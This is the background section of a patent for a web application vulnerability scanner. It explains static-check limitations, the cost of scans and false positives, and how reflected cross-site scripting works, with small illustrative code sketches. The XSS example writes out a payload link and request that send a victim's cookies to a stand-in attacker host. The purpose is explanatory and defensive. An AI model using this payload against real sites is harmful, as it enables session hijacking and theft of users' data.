The present invention relates to the field of web site analysis and, more specifically, to a web site analysis tool that improves the speed and performance of assessing a site by dynamically generating attack strings based on some of the characteristics of operation of the web site.
The free exchange of information facilitated by personal computers surfing over the Internet has spawned a variety of risks for the organizations that host that information and likewise, for those who own the information. This threat is most prevalent in interactive applications hosted on the World Wide Web and accessible by almost any personal computer located anywhere in the world. Web applications can take many forms: an informational Web site, an intranet, an extranet, an e-commerce Web site, an exchange, a search engine, a transaction engine, or an e-business. These applications are typically linked to computer systems that contain weaknesses that can pose risks to a company. Weaknesses can exist in system architecture, system configuration, application design, implementation configuration, and operations. The risks include the possibility of incorrect calculations, damaged hardware and software, data accessed by unauthorized users, data theft or loss, misuse of the system, and disrupted business operations.
As the digital enterprise embraces the benefits of e-business, the use of Web-based technology will continue to grow. Corporations today use the Web as a way to manage their customer relationships, enhance their supply chain operations, expand into new markets, and deploy new products and services to customers and employees. However, successfully implementing the powerful benefits of Web-based technologies can be greatly impeded without a consistent approach to Web application security.
It may surprise industry outsiders to learn that hackers routinely attack almost every commercial Web site, from large consumer e-commerce sites and portals to government agencies such as NASA and the CIA. In the past, the majority of security breaches occurred at the network layer of corporate systems. Today, however, hackers are manipulating Web applications inside the corporate firewall, enabling them to access and sabotage corporate and customer data. Given even a tiny hole in a company's Web-application code, an experienced intruder armed with only a Web browser (and a little determination) can break into most commercial Web sites.
The problem is much greater than industry watchdogs realize. Many U.S. businesses do not even monitor online activities at the Web application level. This lack of security permits even attempted attacks to go unnoticed. It puts the company in a reactive security posture, in which nothing gets fixed until after a breach occurs. Reactive security could mean sacrificing sensitive data as the catalyst for policy change.
A new level of security breach has begun to occur through continuously open Internet ports (port 80 for general Web traffic and port 443 for encrypted traffic). Because these ports are open to all incoming Internet traffic from the outside, they are gateways through which hackers can access secure files and proprietary corporate and customer data. While rogue hackers make the news, there exists a much more likely threat in the form of online theft, terrorism, and espionage.
Today the hackers are one step ahead of the enterprise. While corporations rush to develop their security policies and implement even a basic security foundation, the professional hacker continues to find new ways to attack. Most hackers are using “out-of-the-box” security holes to gain escalated privileges or execute commands on a company's server. Simply misconfiguring an off-the-shelf Web application can leave gaping security vulnerabilities in an unsuspecting company's Web site.
Passwords, SSL and data-encryption, firewalls, and standard scanning programs may not be enough. Passwords can be cracked. Most encryption protects only data transmission; however, the majority of Web application data is stored in a readable form. Firewalls have openings. Scanning programs generally check networks for known vulnerabilities on standard servers and applications, not proprietary applications and custom Web pages and scripts.
Programmers typically don't develop Web applications with security in mind. What's more, most companies continue to outsource the majority of their Web site or Web application development using third-party development resources. Whether these development groups are individuals or consultancies, the fact is that most programmers are focused on the “feature and function” side of the development plan and assume that security is embedded into the coding practices. However, these third-party development resources typically do not have even core security expertise. They also have certain objectives, such as rapid development schedules, that do not lend themselves to the security scrutiny required to implement a “safe solution.”
Manipulating a Web application is simple. It is often relatively easy for a hacker to find and change hidden form fields that indicate a product price. Using a similar technique, a hacker can also change the parameters of a Common Gateway Interface (CGI) script to search for a password file instead of a product price. If some components of a Web application are not integrated and configured correctly, such as search functionality, the site could be subject to buffer-overflow attacks that could grant a hacker access to administrative pages. Today's Web-application coding practices largely ignore some of the most basic security measures required to keep a company and its data safe from unauthorized access.
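The hidden-form-field manipulation described above can be sketched as follows. This is a minimal illustration with hypothetical field names and values; the point is that the server receives an ordinary, well-formed request either way, so nothing at the network layer looks amiss.

```python
# Illustrative sketch of hidden-field parameter manipulation: the client
# simply resubmits the form with the hidden price value altered.
from urllib.parse import urlencode

original_form = {"item_id": "1234", "price": "499.99"}  # as served in hidden fields
tampered_form = dict(original_form, price="0.01")       # attacker edits the hidden field

original_body = urlencode(original_form)  # what the site expects to receive
tampered_body = urlencode(tampered_form)  # what the attacker actually submits
```

Unless the server re-validates the price against its own records, the tampered request is indistinguishable from a legitimate one.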
Developers and security professionals must be able to detect holes in both standard and proprietary applications. They can then evaluate the severity of the security holes and propose prioritized solutions, enabling an organization to protect existing applications and implement new software quickly. A typical process involves evaluating all applications on Web-connected devices, examining each line of application logic for existing and potential security vulnerabilities.
A Web application attack typically involves five phases: port scans for default pages, information gathering about server type and application logic, systematic testing of application functions, planning the attack, and launching the attack. The results of the attack could be lost data, content manipulation, or even theft and loss of customers.
A hacker can employ numerous techniques to exploit a Web application. Some examples include parameter manipulation, forced parameters, cookie tampering, common file queries, use of known exploits, directory enumeration, Web server testing, link traversal, path truncation, session hijacking, hidden Web paths, Java applet reverse engineering, backup checking, extension checking, parameter passing, cross-site scripting, and SQL injection.
Assessment tools provide a detailed analysis of Web application and site vulnerabilities. FIG. 1 is a system diagram of a typical structure for an assessment tool. Through the Web Assessment Interface 100, the user designates which application, site or Web service resident on a web server or destination system 110 available over network 120 to analyze. The user selects the type of assessment, which policy to use, enters the URL, and then starts the process.
The assessment tool uses software agents 130 to conduct the vulnerability assessment. The software agents 130 are composed of sophisticated sets of heuristics that enable the tool to apply intelligent application-level vulnerability checks and to accurately identify security issues while minimizing false positives. The tool begins the crawl phase of the application using software agents to dynamically catalog all areas. As these agents complete their assessment, findings are reported back to the main security engine through assessment database 140 so that the results can be analyzed. The tool then enters an audit phase by launching other software agents that evaluate the gathered information and apply attack algorithms to determine the presence and severity of vulnerabilities. The tool then correlates the results and presents them in an easy-to-understand format through the reporting interface 150.
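The crawl-then-audit flow described above can be sketched as follows. Function names, the page/parameter model, and the check structure are illustrative only, not taken from any particular product; the sketch assumes each check is a predicate applied to one discovered input.

```python
# Hedged sketch of the two-phase assessment flow: crawl catalogs inputs,
# audit applies every check to every discovered input.

def crawl(pages):
    """Catalog every (page, parameter) pair discovered during the crawl phase."""
    inputs = []
    for page, params in pages.items():
        for param in params:
            inputs.append((page, param))
    return inputs

def audit(inputs, checks):
    """Apply each attack check to each discovered input and collect findings."""
    findings = []
    for page, param in inputs:
        for check in checks:
            if check["test"](page, param):
                findings.append((page, param, check["name"]))
    return findings

# With static checks, scan work grows as (number of inputs) x (number of checks):
site = {"/welcome.cgi": ["name"], "/search.cgi": ["query"]}
checks = [{"name": "xss-basic", "test": lambda page, param: param == "name"}]
findings = audit(crawl(site), checks)
```

The nested loop in `audit` is the structural reason scan time scales linearly with the size of the vulnerability database, a point the discussion below returns to.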
One of the popular attacks on web applications is called cross-site scripting, or XSS. XSS is a technique used against a web application to gather personal or malicious information about a user of the web application, and it is one of the most common application-level attacks that hackers use to break into a web application. XSS is a three-party attack involving the attacker, the web application, and a user.
The basic door through which an XSS attack enters is a vulnerable script on the target site. The vulnerable script receives an HTTP request and then echoes it back to the page that sent the request. The echo may be full or partial, but in either case the vulnerability exists because the script does not sanitize the content of the HTTP request before echoing it back. As such, if the HTTP request contains malicious objects, such as JavaScript code or HTML tags, those objects can be acted upon by the receiving browser and cause damage or breach the user's privacy.
Those skilled in the art will be familiar with the various techniques and vulnerabilities that can be exploited using XSS but, for purposes of clarity, a specific example of an XSS attack is presented. Many websites include a welcome page that is presented after logging into the website or upon accessing the website. The welcome script (e.g., welcome.cgi) generally accepts a parameter [name] and, when executed, provides a welcome message to the user. A request sent to the web application generally is structured as:
  GET /welcome.cgi?name=WORLD HTTP/1.0
  Host: www.targetwebsite.com
Upon receiving the request, the web application at www.targetwebsite.com responds with the following response:
  <HTML>
  <Title>Welcome to the TargetWebSite</Title>
  HELLO WORLD
  <BR>
  ...
  </HTML>
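The vulnerable pattern behind such a script can be sketched as follows. Here `welcome` is an illustrative stand-in for the welcome.cgi script discussed above, assuming a simple handler that builds the HTML response directly from the parameter:

```python
# VULNERABLE (for illustration only): the parameter is inserted into the
# HTML verbatim, so any <script> tags it contains reach the browser intact.
def welcome(name):
    return ("<HTML><Title>Welcome to the TargetWebSite</Title>"
            "HELLO " + name + "<BR>...</HTML>")
```

With a benign parameter the script behaves as intended; with a script-bearing parameter, the markup passes through unaltered, which is exactly the opening the attack below exploits.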
To exploit this capability using an XSS attack, a hacker will place a specially structured link at a location convenient for a user to activate. Such placement may include within an email message, or at a web site that is accessed from an email message or potentially browsed by the user. In essence, the link replaces the parameter value for name with JavaScript code that, once echoed to the user's browser, will be executed. Generally, the JavaScript is used to access cookies that the client browser has previously created and that are associated with the target web site. Because JavaScript's security model allows scripts arriving from a particular site to access cookies belonging to that site, and because the browser simply sees the JavaScript as coming from the target web site, the cookies are left vulnerable to this attack. The specially structured link may look like this:
  http://www.targetwebsite.com/welcome.cgi?name=<script>window.open("http://www.attacker.site/collect.cgi?cookie="%2Bdocument.cookie)</script>
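Note the %2B in the link: it is the URL encoding of the + character that concatenates the attacker's URL with document.cookie. The round trip can be shown with Python's standard-library URL helpers (the payload string here is the one from the link above):

```python
# %2B in a URL decodes to "+", producing the string-concatenation operator
# that appears in the server's echoed response.
from urllib.parse import unquote

payload = ('<script>window.open("http://www.attacker.site/'
           'collect.cgi?cookie="%2Bdocument.cookie)</script>')
decoded = unquote(payload)
```

Encoding the + is necessary because, in a query string, a literal + would otherwise be interpreted as a space.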
When the user activates the malicious link, the browser generates the following request:
  GET /welcome.cgi?name=<script>window.open("http://www.attacker.site/collect.cgi?cookie="%2Bdocument.cookie)</script> HTTP/1.0
  Host: www.targetwebsite.com
In response to this request, the target web site provides the following response:
  <HTML>
  <Title>Welcome to the TargetWebSite</Title>
  Hello <script>window.open("http://www.attacker.site/collect.cgi?cookie="+document.cookie)</script>
  <BR>
  ...
  </HTML>
The user's browser receives this response and interprets it as an HTML page containing a piece of JavaScript code. The browser then willingly executes the JavaScript code, which accesses all cookies belonging to or associated with the target web site and sends them to the attacker's web site by invoking a script on the attacker's web site, collect.cgi, that accepts the cookies as a parameter.
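By contrast, a script that sanitizes the parameter before echoing it closes this door: the payload arrives at the browser as inert text rather than executable markup. This sketch uses Python's standard-library html.escape; the function name safe_welcome is illustrative:

```python
from html import escape  # standard-library HTML sanitizer

def safe_welcome(name):
    # The parameter is HTML-escaped before being echoed, so injected
    # <script> tags arrive as harmless text such as &lt;script&gt;.
    return ("<HTML><Title>Welcome to the TargetWebSite</Title>"
            "HELLO " + escape(name) + "<BR>...</HTML>")
```

This one-line sanitization step is precisely what the vulnerable scripts discussed above omit.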
Thus, a hacker can inject JavaScript, VBScript, ActiveX, HTML, or Flash into a vulnerable web application to victimize a user and obtain information from the user. This information can result in account hijacking, changing of user settings, cookie theft/poisoning, or false advertising. Hackers are creating new methods to conduct XSS attacks on a daily basis.
For the most part, using a vulnerability database with static checks has been a successful approach. Today's web application and web services assessment products boast thousands of static checks for security vulnerabilities such as XSS and SQL Injection, and the web application assessment software vendors have essentially been striving to create and market the best vulnerability database with the most checks. However, as web applications and their functionality have grown in scale and complexity, there has been a consequent rise in problems with the standard web application scanning methodology. At the current rate of growth, vulnerability databases will contain tens of thousands of static checks within a few years. With that many checks, the time required to run an application scan becomes quite extensive, because the scan time for an application scales linearly with each additional check in the vulnerability database. Thus, there is a need in the art and related industry for a new technology that will greatly decrease the amount of time required for identifying such vulnerabilities without compromising the effectiveness of the vulnerability assessment tools.

FIG. 2 is a conceptual diagram of how a traditional web application scanning vulnerability assessment would be conducted when seeking an instance of cross-site scripting. The same attacks are repeatedly submitted against all avenues of input that were discovered during a “crawl” of the application to see whether a dialog box can be opened, indicating that the application is indeed susceptible to cross-site scripting. Even if the web application filters a potentially malicious character such as “>”, multiple attacks that include that character will still be submitted. Thus, there are several problems with current state-of-the-art vulnerability assessment tools, creating a need in the art for an improved methodology.
One problem that exists in the art is that the traditional approach of using static checks lacks the application of “intelligence” in solving the problem. The standard “bulk” approach in assessment tools is very limiting in that it applies an “all or nothing” methodology whose only logic is a yes-or-no match and the sheer number of vulnerability signatures being submitted.

Another problem in the state of the art is that assessments take too long. As previously mentioned, the number of potential vulnerabilities and their variants is constantly growing, and longer lists of static checks, each of which must be submitted against an application, mean slower scanning times. It takes a large database of static checks just to ensure the accuracy of a scan.

Yet another problem in the current art is that a high number of false positives is generated using current technologies. As web vulnerabilities and technologies change over time, it is difficult for checks to stay accurate. Vulnerability signatures are “hard coded,” static, and heavily technology dependent; in essence, they cannot be dynamic or intelligent about what the server responds with. This can lead to a high number of “false positives,” in which an automated assessment tool flags a vulnerability that, in actuality, does not exist. Each false positive must be manually verified, which is a time-intensive task.
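The contrast with an adaptive approach can be illustrated with a short sketch. Here, hypothetical helpers first probe which metacharacters the application echoes back unfiltered, and only the attack strings whose required characters survive are submitted; all names and the list of metacharacters are illustrative assumptions, not part of any existing product:

```python
# Sketch of filter-aware check reduction: probe first, then prune the
# attack list to the strings that can actually succeed.
METACHARS = ["<", ">", '"', "'", ";"]

def surviving_chars(echo):
    """Probe the application (modeled here by `echo`) one character at a time."""
    return {c for c in METACHARS if c in echo("probe" + c + "probe")}

def relevant_attacks(attacks, alive):
    """Keep only attack strings whose metacharacters the filter lets through."""
    return [a for a in attacks
            if all(c in alive for c in METACHARS if c in a)]

# An application that strips ">" defeats any attack needing a closing tag,
# so those checks never have to be submitted:
filtered_echo = lambda s: s.replace(">", "")
alive = surviving_chars(filtered_echo)
attacks = ["<script>alert(1)</script>", "';alert(1);'"]
to_submit = relevant_attacks(attacks, alive)
```

A handful of probe requests replaces whole families of doomed static checks, which is the kind of scan-time reduction the discussion below calls for.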
Thus, there is a need in the art for a method and system for conducting vulnerability assessments that does not rely solely on a static approach to performing the assessment, but that can actually apply intelligence in performing the assessment. Such a solution should allow for a reduction in the number of checks that must be performed in conducting an assessment, improve performance by reducing the time required to perform an assessment, and help reduce the occurrence of false positives. Thus, there is a need in the art for a web site and web application assessment tool that can tackle the ever-increasing complexity of analyzing web sites and web applications in a manner that is accurate, yet quicker and more efficient than today's technology. The present invention as described herein provides such a solution.